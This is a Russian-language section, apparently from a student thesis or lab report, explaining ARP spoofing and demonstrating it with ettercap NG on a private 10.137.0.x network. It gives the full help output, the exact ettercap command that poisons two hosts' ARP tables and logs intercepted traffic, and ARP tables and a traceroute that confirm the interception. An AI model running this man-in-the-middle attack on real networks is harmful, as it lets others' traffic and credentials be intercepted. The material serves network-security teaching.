4.2.1.2 Техника выполнения arp-spoofing

До выполнения атаки в ARP-таблице хостов 1 и 2 существуют записи с IP- и MAC-адресами друг друга. Обмен информацией производится непосредственно между узлами 1 и 2 (рисунок 4.4). В ходе выполнения атаки, нарушитель отправляет ARP-ответы узлам сети на которые будет производиться атака (рисунок 4.5 и рисунок 4.6).

Таким образом после получения хостами указанных пакетов, в ARP-таблицах появятся следующие элементы:

хост1: IP2:MAC3

хост2: IP1:MAC3

Вследствие этого первый хост все пакеты, предназначенные для второго хоста будет направлять по MAC-адресу MAC3 (атакующему хосту) [8], тоже самое будет делать и второй хост с пакетами для первого (рисунок 4.7).

Рисунок 4.4 - Нормальное функционирование сети

Рисунок 4.5 - Отправка ложного ARP-ответа хосту

Рисунок 4.6 - Отправка ложного ARP-ответа серверу

Рисунок 4.7 - Функционирование сети во время атаки

Теперь атакующему хосту необходимо «слушать» весь траффик и следующим образом обрабатывать такие пакеты:

- получив (Ethernet) пакет с MAC1->MAC3(IP1->IP2) сменить в этом пакете MAC3->MAC2(IP1->IP2) и отправить пакет;

- получив (Ethernet) пакет с MAC2->MAC3(IP2->IP1) сменить в этом пакете MAC3->MAC1(IP2->IP1) и отправить пакет.

Кроме того, необходимо периодически посылать ложные ARP-ответы хостам - для чтобы созданные записи в ARP-таблице не «устаревали» [24].

Программная реализация ARP-spoofing’a. Для выполнения ARP-spoofing’а была использована программа под windows - ettercapNG. Это сетевой сниффер с большим количеством модулей, в том числе и для осуществления отравления ARP-таблиц атакуемых хостов сети. Запускаем консольный вариант программы. И входим в Ettercap –help:

C:\Program Files\EttercapNG>ettercap --help

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IPs/PORTs (see the man for further detail)

Sniffing and Attack options:

-M, --mitm <METHOD:ARGS> perform a mitm attack

-o, --only-mitm don't sniff, only perform the mitm attack

-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)

-p, --nopromisc do not put the iface in promisc mode

-u, --unoffensive do not forward packets

-r, --read <file> read data from pcapfile <file>

-f, --pcapfilter <string> set the pcap filter <string>

-R, --reversed use reversed TARGET matching

-t, --proto <proto> sniff only this proto (default is all)

User Interface Type:

-T, --text use text only GUI

-q, --quiet do not display packet contents

-s, --script <CMD> issue these commands to the GUI

-C, --curses use curses GUI

-G, --gtk use GTK+ GUI

-D, --daemon daemonize ettercap (no GUI)

Logging options:

-w, --write <file> write sniffed data to pcapfile <file>

-L, --log <logfile> log all the traffic to this <logfile>

-l, --log-info <logfile> log only passive infos to this <logfile>

-m, --log-msg <logfile> log all the messages to this <logfile>

-c, --compress use gzip compression on log files

Visualization options:

-d, --dns resolves ip addresses into hostnames

-V, --visual <format> set the visualization format

-e, --regex <regex> visualize only packets matching this regex

-E, --ext-headers print extended header for every pck

-Q, --superquiet do not display user and password

General options:

-i, --iface <iface> use this network interface

-I, --iflist show all the network interfaces

-n, --netmask <netmask> force this <netmask> on iface

-P, --plugin <plugin> launch this <plugin>

-F, --filter <file> load the filter <file> (content filter)

-z, --silent do not perform the initial ARP scan

-j, --load-hosts <file> load the hosts list from <file>

-k, --save-hosts <file> save the hosts list to <file>

-W, --wep-key <wkey> use this wep key to decrypt wifi packets

-a, --config <config> use the alterative config file <config>

Теперь для осуществления данной атаки необходимо задать параметры и атакуемые узлы:

ettercap -T -M arp -L log /10.137.0.120/ /10.137.0.254/

-T - использовать консольный интерфейс;

-M arp -использовать модуль ARP-spoofing'а для выполнения атаки;

-L log - записывать журнал перехвата в файлы с именем log.*;

Также указываются IP-адреса хостов, против которых будет выполняться атака ARP-spoofing это 10.137.0.120 и 10.137.0.254, 10.137.0.15 – адрес хоста выполняющего атаку.

ARP-таблицы данных атакуемых хостов будут иметь вид:

До атаки

Первый атакуемый хост

arp –a

Интерфейс: 10.137.0.120 --- 0x10004

Адрес IP Физический адрес Тип

10.137.0.254 00-13-49-01-51-4f динамический

10.137.0.15 00-0A-01-D4-D1-E3 динамический

Второй атакуемый хост

arp –a

Интерфейс: 10.137.0.254 --- 0x10004

Адрес IP Физический адрес Тип

10.137.0.120 00-11-D4-01-13-A1 динамический

10.137.0.15 00-0A-01-D4-D1-E3 динамический

Во время атаки

arp –a

Интерфейс: 10.137.0.120 --- 0x10004

Адрес IP Физический адрес Тип

10.137.0.254 00-0A-01-D4-D1-E3 динамический

10.137.0.15 00-0A-01-D4-D1-E3 динамический

arp –a

Интерфейс: 10.137.0.254 --- 0x10004

Адрес IP Физический адрес Тип

10.137.0.120 00-0A-01-D4-D1-E3 динамический

10.137.0.15 00-0A-01-D4-D1-E3 динамический

Если во время атаки отследить путь прохождения пакетов от первого хоста до второго, то он будет таким:

tracert 10.137.0.254

Трассировка маршрута к 10.137.0.254

с максимальным числом прыжков 30:

1 1 ms 1 ms 1 ms 10.137.0.15

2 1 ms 1 ms 1 ms 10.137.0.254

Трассировка завершена.

Как видно, маршрут от первого хоста ко второму лежит, через ложный хост 10.137.0.15.